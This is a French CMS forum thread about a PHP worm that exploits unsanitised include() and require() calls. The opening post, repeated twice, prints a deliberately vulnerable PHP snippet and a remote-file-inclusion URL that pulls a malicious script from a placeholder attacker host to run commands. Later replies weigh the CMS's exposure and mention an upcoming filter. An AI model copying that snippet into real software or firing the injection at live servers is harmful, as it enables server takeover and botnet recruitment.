NPDS : Gestion de contenu et de communauté
Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
30 visiteur(s) et 0 membre(s) en ligne.
Autres infos
Activité du Site
Pages vues depuis 25/05/2001 : 108 403 044
- Nb. de membres 8 693
- Nb. d'articles 1 695
- Nb. de forums 26
- Nb. de sujets 8
- Nb. de critiques 92
Index du forum »» Sécurité »» [Résolu] - Après le ver qui s'attaque à phpbb2... voici...
[Résolu] - Après le ver qui s'attaque à phpbb2... voici...#14848
4Contributeur(s)
3 Modérateur(s)
Cats
Le nouveau ver Php!include!.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias "Php!include!.Worm"].
Contrairement à Santy, Php!include!.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "!include!()" et "require()" de façon non-sécurisée. Comment ?
Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :
-------- Exemple : vulnerable.php --------
if(isset($page))
{
!include!($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses
Php!include!.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.
Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.
Sources : k-otik
Qu'en est-il de NPDS ?
Contrairement à Santy, Php!include!.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "!include!()" et "require()" de façon non-sécurisée. Comment ?
Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :
-------- Exemple : vulnerable.php --------
if(isset($page))
{
!include!($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses
Php!include!.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.
Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.
Sources : k-otik
Qu'en est-il de NPDS ?
Fix
sur npds ok mais dans les modules, y'a pas des !include!s tout frais tout dispo pour les hackers?
ceci dit, il faut aussi tomber sur la bonne variable, on utilise pas forcement $page
ceci dit, il faut aussi tomber sur la bonne variable, on utilise pas forcement $page
Cats
Yep, mais je répète : Php!!include!!.Worm recherche des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies... et ça, ça ne manque pas !!! :paf
developpeur
un filtre activé sur npds.org sera bientot publié pour "contrer" cette petite bête !
Ceci étant santy.c surcharge beaucoup la machina ... et c'est pas cool non plus
Ceci étant santy.c surcharge beaucoup la machina ... et c'est pas cool non plus